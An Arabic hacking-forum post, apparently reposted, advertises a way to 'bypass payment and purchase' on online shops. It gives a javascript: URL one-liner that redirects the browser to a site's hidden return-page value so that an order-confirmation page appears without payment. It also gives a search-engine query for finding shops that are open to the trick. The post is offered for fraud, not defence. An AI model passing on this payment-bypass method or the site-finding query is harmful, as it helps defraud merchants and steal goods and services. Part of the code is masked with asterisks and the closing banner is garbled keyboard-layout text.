(¯`*•¸***9829;_قنبلة تسقط لاول مرة على المنتديات العربية تجاوز عملية الدفع و الشراء دون حسابات حصريا_ ***9829;¸•*´¯)
شباب كيفكم لي مدة طويلة ما عملت موضوع
المهم كلكم بخيير ؟؟
ان شاء الله
ثغرة اليوم ثغرة سهلة جدا رغم ذلك ما شفت اي مننتدى عربي تكلم عليها
ندخل في صلب الموضوع
ثغرة اليوم تتمثل في تجاوز الدفع و الشراء دون مشاكل او البحث عن الحسابات
الثغرة عبارة عن كود جافا
هذا هو الكود
كود PHP:
javascript:top.location=********.getElementsByName ('return')[0].value; javascript:void(0);
ندخل لموقع الي نريد الشراء منو و انحط الكود في المتصفح بالاعلى
و راح يكتبلنا مباشرة
Thank You For Your Order
اكيد الثغرة ما تتطبق على جميع المواقع
بس ما تخافو للبحث على المواقع المصابة عندي دورك سهل جدا
نروح الى العم قوقل و نكتب
'this order button requires a javascript enabled browser'
جميع المواقع الي راح تطلع تطبق عليها الثغرة
انتهى الشرح من خوكم Greenhacker
لا اسامح اي واحد ينقل الموضوع دون ذكر المصدر
و شكرا
تم النقل من طرف hohenheim
(¯`*•¸***9829;_rkfgm jsr' gh,g lvm ugn hglkj]dhj hguvfdm j[h,. ulgdm hg]tu , hgavhx ],k pshfhj pwvdh_ ***9829;¸•*´¯)